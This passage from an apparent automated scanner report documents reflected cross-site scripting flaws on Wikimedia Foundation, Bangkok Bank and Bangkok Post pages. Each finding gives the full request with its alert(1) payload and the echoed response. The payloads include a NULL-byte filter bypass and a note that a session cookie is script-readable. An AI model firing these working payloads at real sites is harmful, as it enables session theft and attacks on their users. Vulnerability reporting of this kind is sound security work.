X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Terms_of_Use
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Terms_of_Use%008f2cf"><script>alert(1)</script>3a4264d3ec6" title="Wikipedia:Terms_of_Use%008f2cf">
...[SNIP]...

5.57. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Terms_of_Use

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00bc49e<script>alert(1)</script>848b1fa4b4e was submitted in the REST URL parameter 2. This input was echoed as bc49e<script>alert(1)</script>848b1fa4b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Terms_of_Use%00bc49e<script>alert(1)</script>848b1fa4b4e HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:14 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Terms_of_Use%00bc49e<script>alert(1)</script>848b1fa4b4e
Content-Length: 5454
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq40.wikimedia.org
X-Cache-Lookup: MISS from sq40.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Terms_of_Use
...[SNIP]...
<p style="font-weight: bold;">To check for "Terms_of_Use%00bc49e<script>alert(1)</script>848b1fa4b4e" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Terms_of_Use%00bc49e<script>
...[SNIP]...

5.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [pagename parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The value of the pagename request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa217'-alert(1)-'5c2eb6720ac was submitted in the pagename parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-Enfa217'-alert(1)-'5c2eb6720ac HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 471
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=NENLAAIDBKCAOPEEJBJONJHM; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:45:04 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-Enfa217'-alert(1)-'5c2eb6720ac';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>

...[SNIP]...

5.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3bb<img%20src%3da%20onerror%3dalert(1)>65f25eabc was submitted in the REST URL parameter 2. This input was echoed as ec3bb<img src=a onerror=alert(1)>65f25eabc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailandec3bb<img%20src%3da%20onerror%3dalert(1)>65f25eabc/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoibnZqMzcycHRvZWV2amJ1bms4ZzQ0Zm5kNjMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=n4grvdblctaiapmpo88fel46d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | company-in-thailandec3bb<img src=a onerror=alert(1)>65f25eabc | financial | banking | search | x26amp</h1>
...[SNIP]...

5.60. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a012"><script>alert(1)</script>93f424d8ca7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/company-in-thailand7a012"><script>alert(1)</script>93f424d8ca7/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiY2NhbjJpN3NibTM3anBlYmNwbjZzbzI0aTQiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=isiu2bkpa8h9e5vt84j7i3srd2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand7a012"><script>alert(1)</script>93f424d8ca7/financial/banking/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand7a012">
...[SNIP]...

5.61. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d5be<img%20src%3da%20onerror%3dalert(1)>8ebb9de52a8 was submitted in the REST URL parameter 3. This input was echoed as 5d5be<img src=a onerror=alert(1)>8ebb9de52a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial5d5be<img%20src%3da%20onerror%3dalert(1)>8ebb9de52a8/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoibHZ0MWhzdXQ0NmVpN2JkNWkwMWV1MmY4YTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=pqti96v7gaphsldjbjem6l2qf0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | financial5d5be<img src=a onerror=alert(1)>8ebb9de52a8 | banking | search | x26amp</h1>
...[SNIP]...

5.62. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 3 (the third path segment) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27762"><script>alert(1)</script>e1fd3f25b24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

The sink, visible in the response below, is the action attribute of the travelSearch form: the payload's "> terminates the attribute value and the form tag, so the script element that follows is parsed as markup. The same segment is copied a second time into the single-quoted JavaScript string passed to chkQuery() in the form's onsubmit handler, a separate sink that would need JavaScript-string encoding of its own even once the attribute is fixed. Note also that the PHPSESSID cookie in this response is set without the HttpOnly flag, so script running in this origin can read it; the __se cookie is HttpOnly.

Request

GET /business/company-in-thailand/financial27762"><script>alert(1)</script>e1fd3f25b24/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNXZnaTk0cTRoYWgzdnE2aHI2Z29oMG84NTAiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=u70jpo9vrbo0ps3iq68q57jcj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand/financial27762"><script>alert(1)</script>e1fd3f25b24/banking/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand/financial27762">
...[SNIP]...

5.63. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 4 (the fourth path segment) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3d3"><script>alert(1)</script>63054be99cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This is the same sink as 5.62, the travelSearch form's action attribute, reached through a different segment. Every segment of the request path is concatenated into that attribute (and into the onsubmit handler's JavaScript string), so the injection surface is the whole path, not one parameter; a fix applied per segment will miss the others.

Request

GET /business/company-in-thailand/financial/banking1a3d3"><script>alert(1)</script>63054be99cc/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoic2o3OHY0b3F1dm80bXUxdDRzdWRpOTFuOTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=lsn7e54cjiqnb6ttvmvf9fs5u1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand/financial/banking1a3d3"><script>alert(1)</script>63054be99cc/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand/financial/banking1a3d3">
...[SNIP]...

5.64. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 4 (the fourth path segment) is copied into the HTML document as plain text between tags. The payload 83b36<img%20src%3da%20onerror%3dalert(1)>e346f5ddf0f was submitted in the REST URL parameter 4. This input was echoed as 83b36<img src=a onerror=alert(1)>e346f5ddf0f in the application's response, i.e. URL-decoded and with no HTML encoding applied.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses an img onerror event handler: the sink is the <h1 class="mainTitle"> breadcrumb shown below, a text-node context, so the injected element is parsed as soon as the unencoded < reaches the browser and its handler fires when the bogus src fails to load.

Request

GET /business/company-in-thailand/financial/banking83b36<img%20src%3da%20onerror%3dalert(1)>e346f5ddf0f/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiMWlxZzljN3ZhZWJxODA4OGRna2w0MjNlaTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=bftqc78l5mptb763uo0kvnt0v7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | banking83b36<img src=a onerror=alert(1)>e346f5ddf0f | search | x26amp</h1>
...[SNIP]...

5.65. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 5 (the fifth path segment) is copied into the HTML document as plain text between tags. The payload 36498<img%20src%3da%20onerror%3dalert(1)>4d8fe330711 was submitted in the REST URL parameter 5. This input was echoed as 36498<img src=a onerror=alert(1)>4d8fe330711 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response, again through an img onerror handler landing in the <h1 class="mainTitle"> breadcrumb. Note the larger Content-Length (30426 bytes against roughly 21500 for the sibling requests): the modified segment changes which page template is rendered, but the breadcrumb sink is the same.

Request

GET /business/company-in-thailand/financial/banking/search36498<img%20src%3da%20onerror%3dalert(1)>4d8fe330711/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZDI2b20wMGM2aHJxOGUzaWJhajJidG42ZTEiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=i4eous98l4tg4heijh182en9t0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | Banking | search36498<img src=a onerror=alert(1)>4d8fe330711 | x26amp</h1>
...[SNIP]...

5.66. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 6 (the sixth and last path segment) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d17"><img%20src%3da%20onerror%3dalert(1)>d9375727ebd was submitted in the REST URL parameter 6. This input was echoed as f0d17"><img src=a onerror=alert(1)>d9375727ebd in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The sink here is different from the breadcrumb cases: the content attribute of the <meta name="keywords"> tag in the document head, shown below. The "> closes the attribute and the meta tag, and the img element that follows is parsed and its onerror handler runs; a head-only sink is no less exploitable than one in the body.

Request

GET /business/company-in-thailand/financial/banking/search/x26ampf0d17"><img%20src%3da%20onerror%3dalert(1)>d9375727ebd HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiMjJjNmEyYjdwaXE5dDZucWcxYnVpMTliajMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=kaigrgm1gs0eaesphdm3teov90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<meta name="keywords" content="news,breaking news,latest news, Business, Company in Thailand, Financial, Banking : x26ampf0d17"><img src=a onerror=alert(1)>d9375727ebd, current news,world news,national news,business news,Thai news" />
...[SNIP]...

5.67. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 6 (the last path segment) is copied into the HTML document as plain text between tags. The payload f519c<img%20src%3da%20onerror%3dalert(1)>2097ffaf22f was submitted in the REST URL parameter 6. This input was echoed as f519c<img src=a onerror=alert(1)>2097ffaf22f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response through an img onerror handler. Together with 5.66 this shows the same segment reaching two sinks, the keywords meta attribute and the <h1 class="mainTitle"> breadcrumb, each of which needs encoding appropriate to its own context.

Request

GET /business/company-in-thailand/financial/banking/search/x26ampf519c<img%20src%3da%20onerror%3dalert(1)>2097ffaf22f HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiMmRqb21ub2QzYmxrcHVwNDk1cThycG5sNTIiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=jg7756afjgk1mirp5hi6adejb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | Banking | search | x26ampf519c<img src=a onerror=alert(1)>2097ffaf22f</h1>
...[SNIP]...

5.68. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 2 (the second path segment) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a76"><script>alert(1)</script>5e0e2a10af5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The sink is the travelSearch form's action attribute, as in 5.62, and the onsubmit handler below carries a second, truncated copy of the same value inside a single-quoted JavaScript string.

Request

GET /business/company-in-thailandb6a76"><script>alert(1)</script>5e0e2a10af5/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiaGlzZnJtbmY2NGtqa2RzbXI4M3JiNzJ0ODMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=be6rurs3kl22hu0a7pckfnbgf5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailandb6a76"><script>alert(1)</script>5e0e2a10af5/financial/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailandb6a76">
...[SNIP]...

